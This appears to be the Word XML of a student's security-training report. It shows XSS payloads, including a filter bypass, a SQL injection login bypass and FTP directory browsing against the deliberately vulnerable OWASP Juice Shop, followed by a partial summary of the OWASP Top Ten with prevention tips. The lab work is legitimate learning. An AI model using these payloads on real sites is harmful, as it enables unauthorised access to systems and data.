    <w:p w14:paraId="60593F7E" w14:textId="5AE5B7A3" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="39C2D383" w14:textId="023926A1" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="658BA063" w14:textId="77777777" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="16719C15" w14:textId="1F7D9D29" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D"/>
    <w:p w14:paraId="3102E4F8" w14:textId="5716C4FA" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D"/>
    <w:p w14:paraId="1F8F7E38" w14:textId="77777777" w:rsidR="0087543D" w:rsidRPr="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D"/>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1EDFE133" w:rsidR="00490A30" w:rsidRDefault="009A5302" w:rsidP="009A5302">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc114777207"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Juice Shop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidR="00E67820">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EA8852" w14:textId="77777777" w:rsidR="00412D22" w:rsidRDefault="009A5302" w:rsidP="00412D22">
      <w:r>
        <w:t>Juice shop has the same purpose as DVWA. It is a website full of vulnerabilities that I can test.</w:t>
      </w:r>
      <w:r w:rsidR="00412D22">
        <w:t xml:space="preserve"> It has score board that indicates how far you have discovered all the vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3916D558" w14:textId="0D7C71C8" w:rsidR="009A5302" w:rsidRDefault="009A5302" w:rsidP="00412D22">
      <w:r>
        <w:t xml:space="preserve">I will try to implement most of the pen testing skills that I have on it and </w:t>
      </w:r>
      <w:r w:rsidR="00412D22">
        <w:t>check my score board.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A25BDC6" w14:textId="0AFD551B" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22">
      <w:r>
        <w:t xml:space="preserve">Firstly, I like to test the cross-site scripting vulnerabilities. Therefore, let me look for a searching bar and execute some JavaScript code on it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B69DBD" w14:textId="7FCE2696" w:rsidR="00CD17BB" w:rsidRDefault="00CD17BB" w:rsidP="00412D22"/>
    <w:p w14:paraId="22AB3AE9" w14:textId="375BCA67" w:rsidR="00CD17BB" w:rsidRDefault="00CD17BB" w:rsidP="00412D22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57709A3F" wp14:editId="63E705DC">
            <wp:extent cx="5731510" cy="300037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6D14A56" w14:textId="33F5BC6E" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="2033B859" w14:textId="0097B7FD" w:rsidR="00412D22" w:rsidRDefault="00CD17BB" w:rsidP="00412D22">
      <w:r>
        <w:t>As you can see, I managed to find a XSS vulnerability. All I had to do was put this code on an input filed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577A068D" w14:textId="3E42DC91" w:rsidR="00CD17BB" w:rsidRDefault="00CD17BB" w:rsidP="00412D22">
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>=”xx</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>onError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>=”alert(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)”/ &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261472F4" w14:textId="20C86C88" w:rsidR="007D17C9" w:rsidRDefault="007D17C9" w:rsidP="00412D22">
      <w:r>
        <w:t>Other codes that might work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F86B8E" w14:textId="0886E39D" w:rsidR="007D17C9" w:rsidRDefault="007D17C9" w:rsidP="00412D22">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6AE11" w14:textId="55AD1D56" w:rsidR="007D17C9" w:rsidRDefault="007D17C9" w:rsidP="007D17C9">
      <w:r>
        <w:t xml:space="preserve">This could work because it takes the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code and inject it inside the search function and it would look like the developer put it there on purpose.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4B554A" w14:textId="6BE6779E" w:rsidR="007D17C9" w:rsidRDefault="007D17C9" w:rsidP="007D17C9">
      <w:r>
        <w:t>Some developers know this trick and decide to block the word “script” from all the inputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0387E156" w14:textId="0885AAF0" w:rsidR="007D17C9" w:rsidRPr="007D17C9" w:rsidRDefault="007D17C9" w:rsidP="007D17C9">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The blocking process still executes the input but only deletes the word “script”. Therefore, we can do this trick which is typing </w:t>
      </w:r>
      <w:r w:rsidR="009E072A">
        <w:t>the word twice</w:t>
      </w:r>
      <w:r w:rsidR="001C2206">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDB1E7B" w14:textId="3CB1B559" w:rsidR="007D17C9" w:rsidRDefault="007D17C9" w:rsidP="007D17C9">
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>sscriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&gt;alert(‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>sscriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601A5FD3" w14:textId="385696AB" w:rsidR="007D17C9" w:rsidRDefault="001C2206" w:rsidP="00412D22">
      <w:r>
        <w:t>Other vulnerability is being able to access the confidential document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F660AF4" w14:textId="0D2E2D6F" w:rsidR="001C2206" w:rsidRDefault="001C2206" w:rsidP="001C2206">
      <w:r>
        <w:t>We notice on the page About Us, there is a highlighted text that when we hover on it, it indicates that it sends us to this link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F91B518" w14:textId="69E1C895" w:rsidR="001C2206" w:rsidRDefault="00786AE6" w:rsidP="001C2206">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15D8EC60" wp14:editId="001CD613">
            <wp:extent cx="5731510" cy="154114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84A2089" w14:textId="2F2FF3AA" w:rsidR="00412D22" w:rsidRDefault="00786AE6" w:rsidP="00412D22">
      <w:r>
        <w:t>I know that the ftp file should have more files that I care to look at. Therefore, I can copy the link and remove the last word because I do not care about that specific file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3829E" w14:textId="64D6DAA3" w:rsidR="00786AE6" w:rsidRDefault="00786AE6" w:rsidP="00412D22"/>
    <w:p w14:paraId="218E86FE" w14:textId="58E8B418" w:rsidR="00786AE6" w:rsidRDefault="00786AE6" w:rsidP="00412D22">
      <w:r>
        <w:t>Then a page full of files appear:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7251E757" w14:textId="0D2148E2" w:rsidR="00786AE6" w:rsidRDefault="00786AE6" w:rsidP="00412D22">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50F5C6EA" wp14:editId="14013FA9">
            <wp:extent cx="5731510" cy="12827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0F5AD909" w14:textId="5601B413" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="1A660DC1" w14:textId="203F0365" w:rsidR="00412D22" w:rsidRDefault="00786AE6" w:rsidP="00412D22">
      <w:r>
        <w:t>Now I can download and open any file I want.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E10987" w14:textId="785FFE68" w:rsidR="00786AE6" w:rsidRDefault="00786AE6" w:rsidP="00412D22">
      <w:r>
        <w:t>Let us move to something more interesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AFE28B" w14:textId="47A97CED" w:rsidR="00786AE6" w:rsidRDefault="00786AE6" w:rsidP="00412D22">
      <w:r>
        <w:t xml:space="preserve">I will go to the log in page, </w:t>
      </w:r>
      <w:r w:rsidR="0054284C">
        <w:t>on the username input field, I can type this line to bypass the log in and be able to log in as an admin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A7613" w14:textId="5CC145C4" w:rsidR="0054284C" w:rsidRDefault="0054284C" w:rsidP="00412D22">
      <w:r w:rsidRPr="0054284C">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’ OR 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A3DA8F" w14:textId="38C520C4" w:rsidR="0054284C" w:rsidRDefault="0054284C" w:rsidP="00412D22">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>‘ closes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query that the database expects. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D86DB10" w14:textId="538B134E" w:rsidR="0054284C" w:rsidRDefault="0054284C" w:rsidP="00412D22">
      <w:r>
        <w:t xml:space="preserve">The OR statement is for typing something that is true so the database return true to the website. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1970875B" w14:textId="415C4220" w:rsidR="0054284C" w:rsidRDefault="0054284C" w:rsidP="00412D22">
      <w:r>
        <w:t>The # for commenting everything that comes after the true statement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B61A011" w14:textId="2EA95D8F" w:rsidR="001E1C59" w:rsidRDefault="001E1C59" w:rsidP="00412D22">
      <w:r>
        <w:t xml:space="preserve">The database returns </w:t>
      </w:r>
      <w:r w:rsidR="00EE7C20">
        <w:t>true,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and I log in successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3277100A" w14:textId="1CAF285A" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="06ABBA93" w14:textId="05213D86" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="6741DFEB" w14:textId="65383AF2" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="393A4A6E" w14:textId="0C4622C0" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="79AFC97B" w14:textId="67D17A8D" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="6A5771A0" w14:textId="37AEF160" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="4D6EB914" w14:textId="2BBF1FDD" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="65D4DA2E" w14:textId="3F32ABB1" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00EE7C20">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc114777208"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP Top Ten</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="2B4F4858" w14:textId="2C1F134C" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00EE7C20">
      <w:r>
        <w:t xml:space="preserve">Open Web Application Security Project is an </w:t>
      </w:r>
      <w:r w:rsidR="00773220">
        <w:t>open-source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> software that aims to improve the security of</w:t>
      </w:r>
      <w:r w:rsidR="00773220">
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applications</w:t>
      </w:r>
      <w:r w:rsidR="00773220">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F1D18" w14:textId="74A88E49" w:rsidR="00773220" w:rsidRDefault="00773220" w:rsidP="00EE7C20">
      <w:r>
        <w:t>OWASP Top Ten refers to the top 10 critical security risks to web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016772F2" w14:textId="08BF9DD1" w:rsidR="00773220" w:rsidRDefault="00773220" w:rsidP="00EE7C20">
      <w:r>
        <w:t>The current version</w:t>
      </w:r>
      <w:r w:rsidR="00B532A1">
        <w:t xml:space="preserve"> of the list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was updated in 2021 whereas the previous one was in 2017</w:t>
      </w:r>
      <w:r w:rsidR="00B532A1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A15FDB1" w14:textId="21C11609" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00EE7C20">
      <w:r>
        <w:t>2021 added some new vulnerabilities. However, most of them remain on the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07771CCF" w14:textId="336552B2" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00EE7C20">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="608B5926" wp14:editId="5F883274">
            <wp:extent cx="5731510" cy="1579880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="77" name="Picture 77"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849BB72" w14:textId="7E8282DC" w:rsidR="0054284C" w:rsidRPr="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00412D22">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B532A1">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">(Picture from </w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidRPr="005A0D28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="14"/>
            <w:szCs w:val="14"/>
          </w:rPr>
          <w:t>https://owasp.org/www-project-top-ten/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B532A1">
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2E5D89" w14:textId="1D60DB5A" w:rsidR="00412D22" w:rsidRDefault="00412D22" w:rsidP="00412D22"/>
    <w:p w14:paraId="27CBD62D" w14:textId="3E240427" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00412D22">
      <w:r>
        <w:t>Let me talk about the top 10 security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF02AF" w14:textId="34F20A68" w:rsidR="00B532A1" w:rsidRPr="00385FC2" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448607BB" w14:textId="48963483" w:rsidR="00B532A1" w:rsidRDefault="00385FC2" w:rsidP="00B532A1">
      <w:r>
        <w:t xml:space="preserve">It is when the attacker gets inside the victim’s system as a privileged user. This problem sounds less dangerous than it really is. This risk deserves its rank as the top on the list, because giving the attacker all the permission to do anything </w:t>
      </w:r>
      <w:r w:rsidR="0000253B">
        <w:t xml:space="preserve">might terminate the whole system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A32746D" w14:textId="2B342031" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF52E96" w14:textId="7E11EBC1" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Log all the access control failures, and always alert admins.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51154005" w14:textId="5C3EFA10" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0000253B">
        <w:t>Disable web server directory listin</w:t>
      </w:r>
      <w:r>
        <w:t>g.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770C0C8E" w14:textId="77777777" w:rsidR="0000253B" w:rsidRDefault="0000253B" w:rsidP="0000253B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E9A23ED" w14:textId="244A8E23" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00B532A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cryptographic Failures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767C87B9" w14:textId="2BC2BDEF" w:rsidR="0000253B" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:r>
        <w:t>It is the failures that are related to cryptography. This could leak sensitive and secret information that is being sent through the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD4859" w14:textId="2D6D58B7" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:r>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F11FAC" w14:textId="2A17873F" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Do not store any sensitive data if you do not need them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1EB37" w14:textId="63AC3E59" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encrypt all sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E0BA97" w14:textId="01CDA165" w:rsidR="00E86C6E" w:rsidRDefault="00E86C6E" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Disable caching for response with sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B53EDD" w14:textId="1E0C7BCD" w:rsidR="00F01C26" w:rsidRPr="00E86C6E" w:rsidRDefault="00F01C26" w:rsidP="00E86C6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F01C26">
        <w:t>Always use authenticated encryption instead of just encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021B0F6F" w14:textId="632E1E0B" w:rsidR="00F01C26" w:rsidRDefault="00B532A1" w:rsidP="00F01C26">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B436682" w14:textId="6518882A" w:rsidR="00F01C26" w:rsidRDefault="00F01C26" w:rsidP="00F01C26">
      <w:r>
        <w:t>Injection is when the attacker injects their malicious code into any program to force it to behave as wanted. (e.g., stealing authentication cookies, storing malicious code in the database, retrieving sensitive data from the datab</w:t>
      </w:r>
      <w:r w:rsidR="00182C69">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>se)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792CA944" w14:textId="77777777" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00F01C26"/>
    <w:p w14:paraId="3113F130" w14:textId="77777777" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>How to help to prevent it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC6A3A" w14:textId="3FF5B0B1" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use blacklist to the inputs on the website to block any malicious words like the tag script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F88414E" w14:textId="2C9109F6" w:rsidR="00182C69" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use the LIMIT and other SQL controls within queries to not expose your sensitive data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337EA39" w14:textId="1C6355CC" w:rsidR="00182C69" w:rsidRPr="00F01C26" w:rsidRDefault="00182C69" w:rsidP="00182C69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on your server to block any malicious </w:t>
      </w:r>
      <w:r w:rsidR="00881CA3">
        <w:t>injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123BE446" w14:textId="273DA219" w:rsidR="003A6D48" w:rsidRDefault="00B532A1" w:rsidP="003A6D48">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385FC2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure Design</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02804DB0" w14:textId="69FC53B4" w:rsidR="003A6D48" w:rsidRDefault="00A43ABC" w:rsidP="003A6D48">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00A43ABC">
        <w:t>Implementing the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> suitable design to the web applications is very important to block the way for the attacker to inject something. </w:t>
      </w:r>
    </w:p>
